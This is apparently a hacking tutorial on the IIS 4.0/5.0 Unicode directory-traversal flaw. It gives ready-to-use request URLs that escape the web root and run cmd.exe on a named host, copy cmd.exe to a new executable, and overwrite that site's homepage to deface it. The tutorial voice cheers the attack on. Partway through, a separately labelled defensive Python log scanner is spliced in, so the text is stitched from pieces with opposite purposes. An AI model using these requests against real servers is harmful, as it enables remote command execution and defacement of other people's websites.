There are more than ten common IIS vulnerabilities, but the one most often exploited is the Unicode decoding vulnerability. Microsoft IIS 4.0/5.0 has a security flaw in its implementation of Unicode character decoding that allows arbitrary commands to be executed remotely through IIS. When IIS opens a file whose name contains Unicode characters, it decodes them first; given certain specially crafted encodings, IIS may mistakenly open or execute files or programs outside the web root directory. This article explains how this vulnerability is used to break into IIS.
For the Chinese versions of IIS 4.0/5.0, when the file name in a URL request received by IIS contains a special encoding such as "%C1%HH" or "%C0%HH", IIS first decodes it to the bytes "0xC1 0xHH" and then tries to open the file. On Windows, "0xC1 0xHH" can be a Unicode (UTF-8) encoding, so it is decoded once more. If 0x00 <= 0xHH < 0x40, the decoding works as follows:
%C1%HH -> (0xC1 - 0xC0) * 0x40 + 0xHH
%C0%HH -> (0xC0 - 0xC0) * 0x40 + 0xHH
Using this encoding we can therefore construct many characters, for example:
%C1%1C -> (0xC1 - 0xC0) * 0x40 + 0x1C = 0x5C = '\'
%C0%2F -> (0xC0 - 0xC0) * 0x40 + 0x2F = 0x2F = '/'
Attackers can exploit this to bypass the IIS path check and open or execute arbitrary files. The vulnerability first appears in the Chinese version of IIS 4.0 + SP6 and also affects the Chinese versions of Win2000 + IIS 5.0 and Win2000 + IIS 5.0 + SP1.
On NT4 the path separator is encoded as "%C1%9C", on English Win2000 as "%C0%AF", and on Chinese Win2000 as "%C1%1C". There are several other encodings as well, which are not listed one by one here; you can look them up. This document uses Win2000 as the example; substitute the encoding for other versions as needed.
Determine whether a vulnerability exists
Scanning with a scanner for this vulnerability is the common way. But we know that scanning is not a real attack in itself; it is only a way to find the entrance. There are many Unicode vulnerability scanners for IIS, such as rangescan or unicodescan, which collect server information. Besides Unicode, some comprehensive scanning software also collects other server vulnerabilities, such as X-Scan (http://bitscn.com/upload/X-Scan-v3.1-cn.rar).
Of course, you can also enter the following URL in the IE browser to check:
http://aa.feedom.net/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
Anyone who knows a little DOS will understand this: the malformed request walks us out of the web root into system32. If the inetpub directory is not on the same drive letter as WinNT, or the directory depth is different, the request may fail.
If the vulnerability exists, the browser shows something like the following:
Directory of c:\Inetpub\scripts
<DIR>          .
<DIR>          ..
Doesn't it feel like your own machine? This is exactly what we want!
cmd.exe is the equivalent of command.com in DOS, so we can run many commands with it!
Note: in the URL above, the "+" after "/c" is actually a space. Remember this! DIR is the DOS command for listing files and directories; if you do not know DOS, go and learn it.
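The decoding arithmetic above and the "does the vulnerability exist" check can both be turned around into a defender's tool. The following is an added example, not code from the original article: it emulates the permissive two-byte decode in its general form ((lead & 0x1F) << 6) | (second & 0x3F), which reduces to the page's (lead - 0xC0) * 0x40 + second when the second byte is below 0x40 and also covers the NT4 (%C1%9C) and English Win2000 (%C0%AF) variants, then runs that decode over constructed IIS-style log lines to flag requests that escape the web root. The log format, client addresses and function names are assumptions for the example.

```python
import re

PCT = re.compile(r"%([0-9A-Fa-f]{2})")

def percent_decode_bytes(path: str) -> bytes:
    """Turn %XX escapes into raw bytes (latin-1 maps codes 0-255 to single bytes)."""
    return PCT.sub(lambda m: chr(int(m.group(1), 16)), path).encode("latin-1", "replace")

def lenient_decode(raw: bytes):
    """Emulate the permissive two-byte decoding the page describes.

    A 0xC0/0xC1 lead byte is always an overlong encoding of an ASCII value and a
    correct UTF-8 decoder rejects it; the flawed decoder instead computed
    ((lead & 0x1F) << 6) | (second & 0x3F), which is the page's
    (lead - 0xC0) * 0x40 + second when second < 0x40.  Returns (text, overlong count)."""
    chars, overlong, i = [], 0, 0
    while i < len(raw):
        b = raw[i]
        if b in (0xC0, 0xC1) and i + 1 < len(raw):
            chars.append(chr(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F)))
            overlong += 1
            i += 2
        else:
            chars.append(chr(b))
            i += 1
    return "".join(chars), overlong

def is_unicode_traversal(path: str) -> bool:
    """True when an overlong pair was decoded AND the result steps out of the
    web root ('..' followed by either separator)."""
    decoded, overlong = lenient_decode(percent_decode_bytes(path))
    return overlong > 0 and "../" in decoded.replace("\\", "/")

# Constructed sample in an assumed IIS-style "client method uri-stem status" form.
SAMPLE_LOG = [
    "192.0.2.10 GET /index.htm 200",
    "192.0.2.77 GET /scripts/..%c1%1c../winnt/system32/cmd.exe 200",
    "192.0.2.77 GET /scripts/..%c0%af../winnt/system32/cmd.exe 200",
    "192.0.2.10 GET /search.asp 200",
]

def scan_log(lines):
    """Return (client, uri-stem) for every line that carries a Unicode traversal."""
    hits = []
    for line in lines:
        parts = line.split()
        if len(parts) >= 3 and is_unicode_traversal(parts[2]):
            hits.append((parts[0], parts[2]))
    return hits
```

A correct decoder never produces a separator from %C1%1C, so any overlong pair in a request path is itself a strong signal even before the traversal check.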
After reading the introduction above, it goes without saying that this vulnerability can be used to attack the server!
Modify website homepage
1. Confirm the homepage name.
The home page of a typical website is named index.htm, index.html, index.asp, default.htm, default.html or default.asp. You can try different home page names to determine the home page of the website you want to modify. Enter the following three URLs in the IE address bar:
http://aa.feedom.net/index.html
http://aa.feedom.net/default.asp
http://aa.feedom.net/index.htm
After testing the three URLs, we find that only the third one opens normally, which shows that the website's home page is named index.htm. Now, let's modify it!
2. Modification Principle
The most convenient method is the echo method. ECHO is a system command mainly used to turn command echoing on or off, but it also prints its arguments, and that output can be redirected into a file:
echo test> C:\autoexec.bat writes test into autoexec.bat and deletes the original content;
echo TimeDate>> C:\autoexec.bat appends TimeDate without deleting the original content.
Understood? Now the modification is easy.
3. Change the homepage
Enter the following address in IE:
http://aa.feedom.net/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+echo+hahathisismyhack+>C:\Inetpub\wwwroot\index.htm
The results returned by IE may be one of the following two situations:
1) HTTP 500-Internal Server Error
2) The parameter is incorrect
Judging from the returned message and the way cmd parses its arguments, the command line probably has a parameter error. Add a double-quote (") character and try again:
1) http://aa.feedom.net/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo+hahathisismyhack+>C:\Inetpub\wwwroot\index.htm
This writes hahathisismyhack into the index.htm file and deletes the original content.
2) http://aa.feedom.net/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo+by2005-3-9+>>C:\Inetpub\wwwroot\index.htm
This appends by2005-3-9 to the index.htm file without deleting the original content.
Normally the response to both of these requests is a CGI error. This means the command was executed successfully and the system is only reporting the error as a formality, so ignore it.
Now open the website aa.feedom.net and take a look. What happened? Has the home page changed? In practice, because of directory permissions and other administrative factors, this method may still fail. In that case we can copy cmd.exe to another .exe file and call that instead, but be careful with the path and do not make any mistakes. For example:
http://aa.feedom.net/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+cmd.exe+c:\a.exe
http://aa.feedom.net/scripts/..%c1%1c../a.exe?/c+echo+hackedbycshu+>C:\Inetpub\wwwroot\index.htm
The technique described in this article is fairly simple and suitable for beginners to study. You may be able to modify the home page of the example server by following the steps given here, but in real situations the server environment will inevitably differ, and the obstacle may be something you have never studied or encountered. Only when the basics are firmly grasped do you have the foundation for more advanced work; the knowledge points mentioned in this article can serve as a guide for further study.